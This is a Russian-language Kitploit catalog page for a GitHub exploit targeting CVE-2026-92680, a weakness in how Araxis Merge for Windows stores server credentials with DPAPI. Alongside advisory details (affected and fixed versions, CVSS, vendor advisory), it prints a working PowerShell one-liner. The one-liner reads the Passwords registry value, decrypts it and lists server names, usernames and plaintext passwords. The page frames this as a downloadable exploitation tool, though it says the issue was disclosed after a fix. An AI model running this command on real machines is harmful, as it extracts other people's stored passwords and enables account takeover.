Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-92680 — Эксплойт для расшифровки учётных данных сервера Araxis Merge, защищённых DPAPI (CVE-2026-92680), демонстрирующий недостаточную защиту хранилища учётных данных в Windows. | Kitploit
Инструменты/GitHubGitHub/grepstrength/cve-2026-92680
Взлом паролейАнализ уязвимостейЭксплуатацияКриптография
GitHubgrepstrength/cve-2026-92680

CVE-2026-92680

Эксплойт для расшифровки учётных данных сервера Araxis Merge, защищённых DPAPI (CVE-2026-92680), демонстрирующий недостаточную защиту хранилища учётных данных в Windows.

Репозиторий
1121 ч 8 мин назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-92680

Araxis Merge для Windows хранит учётные данные сервера с помощью DPAPI с pOptionalEntropy, установленным в NULL. Это позволяет любому коду, работающему в том же контексте пользователя, расшифровать их.

Полное описание: https://grepstrength.com/research/araxis-merge

CVECVE-2026-92680
CWECWE-522: Insufficiently Protected Credentials
CVSS v3.15.5 (AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)
VendorAraxis Ltd.
AffectedAraxis Merge for Windows 2011.4074 through 2026.0
Fixed in2026.1
Vendor advisoryMerge-SA-26-00
Reported2026-08-18
Disclosed2026-XX-XX
ReportergrepStrength

Proof-of-Concept

Это расшифрует и разберёт HKCU\Software\Araxis\Merge\7.1\Passwords. Это должно быть запущено от имени того же пользователя Windows, который изначально сохранил учётные данные.

root@kitploit:~
Add-Type -AssemblyName System.Security; $p=[Security.Cryptography.ProtectedData]::Unprotect((Get-ItemProperty "HKCU:\Software\Araxis\Merge\7.1").Passwords,$null,'CurrentUser'); $i=48; $f=@(); while($i -lt $p.Length){$l=[BitConverter]::ToInt64($p,$i+8);$i+=16;$f+=[Text.Encoding]::Unicode.GetString($p,$i,$l*2);$i+=$l*2}; 0..($f.Count/4-1)|%{[PSCustomObject]@{Server=$f[$_*4+1];Username=$f[$_*4+2];Password=$f[$_*4+3]}}|Format-Table -AutoSize

Примечания

Все тесты проводились на системах, принадлежащих grepStength Security, с использованием только синтетических учётных данных. Об этом было сообщено Araxis Ltd., и информация была публично раскрыта после выпуска исправления.

Лицензия

MIT

Скачать инструмент